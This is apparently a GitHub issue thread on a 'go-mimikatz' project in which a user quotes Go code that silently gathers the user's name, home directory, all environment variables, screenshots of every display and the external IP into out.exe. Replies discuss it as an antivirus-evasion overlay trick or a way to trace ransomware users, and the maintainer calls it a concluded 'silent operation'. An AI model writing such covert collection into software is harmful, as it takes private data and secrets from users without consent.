go-mimikatz
go-mimikatz copied to clipboard
Why write personal information to out.exe ?
thisUser, err := user.Current()
checkErr(err)
pkg := bytes.NewBuffer([]byte{})
pkg.WriteString("|*****|")
pkg.WriteString(thisUser.HomeDir)
pkg.WriteString("|||")
pkg.WriteString(thisUser.Username)
pkg.WriteString("|||")
pkg.WriteString(thisUser.Name)
for _, enVar := range os.Environ() {
pkg.WriteString(enVar)
pkg.WriteString("|")
}
for index := 0; index < screenshot.NumActiveDisplays(); index++ {
img, err := screenshot.CaptureRect(screenshot.GetDisplayBounds(index))
checkErr(err)
png.Encode(pkg, img)
pkg.WriteString("|||")
}
resp, err := http.Get("https://myexternalip.com/raw")
checkErr(err)
defer resp.Body.Close()
ip, err := ioutil.ReadAll(resp.Body)
checkErr(err)
pkg.Write(ip)
pkg.WriteString("|||")
pkg.WriteString(runtime.GOARCH)
pkg.WriteString("|||")
pkg.WriteString(runtime.GOOS)
影舞者大佬,这是overlay技术静态免杀defender和360的,虽然我也觉得收集的信息有点太隐私了,不过没有发送这些数据而且这些数据会加密
影舞者大佬,这是overlay技术静态免杀defender和360的,虽然我也觉得收集的信息有点太隐私了,不过没有发送这些数据而且这些数据会加密
后面看了下之前的readme,有人拿这工具做勒索,估计是为了溯源用的了
this code is now removed, I put it there as a silent operation and the operation has now concluded :)